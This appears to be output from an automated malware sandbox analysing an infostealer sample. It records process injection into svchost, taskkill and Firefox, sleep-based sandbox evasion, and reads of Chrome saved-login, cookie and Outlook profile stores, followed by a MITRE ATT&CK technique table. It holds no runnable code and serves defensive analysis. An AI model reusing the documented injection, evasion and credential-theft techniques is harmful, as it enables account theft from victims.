        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeAPI/Special instruction interceptor: Address: 36F568C
        Source: C:\Windows\SysWOW64\taskkill.exeWindow / User API: threadDelayed 1221Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeWindow / User API: threadDelayed 8737Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
        Source: C:\Windows\SysWOW64\taskkill.exe TID: 3412Thread sleep count: 1221 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exe TID: 3412Thread sleep time: -2442000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exe TID: 3464Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exe TID: 3412Thread sleep count: 8737 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exe TID: 3412Thread sleep time: -17474000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe TID: 3416Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe TID: 3416Thread sleep time: -43500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe TID: 3416Thread sleep count: 35 > 30Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe TID: 3416Thread sleep time: -35000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\taskkill.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\taskkill.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess queried: DebugPortJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtClose: Direct from: 0x774CFA02
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: NULL target: C:\Windows\SysWOW64\taskkill.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeThread APC queued: target process: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ncOLm62YLB.exe"Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
        Source: dGGVPduKBhByY.exe, 00000003.00000000.420687314.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000003.00000002.881626517.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881742956.0000000000F60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: dGGVPduKBhByY.exe, 00000003.00000000.420687314.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000003.00000002.881626517.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881742956.0000000000F60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: dGGVPduKBhByY.exe, 00000003.00000000.420687314.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000003.00000002.881626517.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881742956.0000000000F60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
        Source: ncOLm62YLB.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lvxx7b78.zip VolumeInformationJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        312
        Process Injection
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote Services1
        Email Collection
        5
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Abuse Elevation Control Mechanism
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Data from Local System
        5
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        312
        Process Injection
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Abuse Elevation Control Mechanism
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        Remote System Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
        File and Directory Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
